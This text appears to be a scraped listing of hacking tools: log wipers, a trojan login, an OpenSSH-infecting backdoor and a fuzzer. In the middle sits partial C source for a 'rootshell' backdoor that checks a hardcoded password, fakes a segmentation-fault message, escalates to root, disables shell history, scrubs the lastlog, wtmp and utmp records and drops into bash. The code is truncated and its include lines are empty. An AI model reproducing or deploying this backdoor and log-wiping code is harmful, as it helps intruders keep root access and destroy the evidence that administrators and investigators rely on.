Trojan /bin/login.
SIP Army Knife is a fuzzer that searches for cross site scripting, SQL injection, log injection, format strings, buffer overflows, and more.
Linux Log Eraser is a set of shell scripts that will cleanly search for specific data in log files and wipe it.
Last Door is a utility written to wipe specific entries in arbitrary log files and if setuid, will also execute arbitrary commands without logging any history.
WhiteCat log cleaner version 1.0. WhiteCat is designed for any UNIX-like system, but tested only on Linux. Distributed under GPLv2.
A bash script to wipe or exchange your IP in unix log files. Also wipes out /root/.bash_history.
SSHeater is a program that infects the OpenSSH daemon in run-time in order to log all future sessions and implement a backdoor where a single password, chosen by the user, can log into all accounts in the system. There's a log parser included in the package that can display authentication information about sessions as well as play the session just like TTYrec/play.
Simple IPv4 and IPv6 banner grabbing scripts; typically used for telnet/cisco appliances, although may work on services.
Unix log cleaner that also checks to see if root is logged in.
/*
rsh-v2 rootshell by rotor http://www.c1zc0.com
irc.efnet.org #c1zc0
usage: ./rshv2
*/
#include
#include
#include
#include
#include
#include
#include
#include
#define PASS "c1zk0"
#define _PATH_LASTLOG "/var/log/lastlog"
#define _WTMP_PATH "/var/log/wtmp"
#define _UTMP_PATH "/var/run/utmp"
int clean_last(char *path, char *user);
int wtmp_clean(char *path, char *user);
void chkr();
int main(int argc, char **argv[])
{
char *pass = argv[1];
char *pazz = PASS;
struct utsname u;
uname(&u);
if(argc < 1){
printf("Segmentation fault (core dumped)\n");
exit(0);
}
if(strcmp(pass, pazz)) {
printf("Segmentation fault (core dumped)\n");
exit(0);
} else {
setuid(0);
setuid(0);
unsetenv("PS1");
unsetenv("HISTFILE");
printf("Cleaning lastlog!\n");
clean_last(_PATH_LASTLOG, argv[2]);
printf("Cleaning WTMP\n");
wtmp_clean(_WTMP_PATH, argv[2]);
printf("Cleaning UTMP\n");
wtmp_clean(_UTMP_PATH, argv[2]);
printf("Checking for root logged in\n");
chkr();
printf("System name: %s, Node Name: %s\n", u.sysname, u.nodename);
printf("Release: %s, Version: %s\n", u.release, u.version);
execl("/bin/bash", "sh", NULL);
}
return 0;
}
int clean_last(char *path, char *user) {
FILE *lastlog_file;
struct passwd *pwd;
struct lastlog lastlog_tmp;
int count=0;
if((lastlog_file = fopen(path, "r+")) == NULL) {
printf("failed to open file %s\n", path);
return 0;
}
if ((pwd = getpwnam(user)) == NULL) {
printf("user %s not found\n", user);
return 0;
}
Nabi version 2.0 - Advanced /var log wiper for Linux.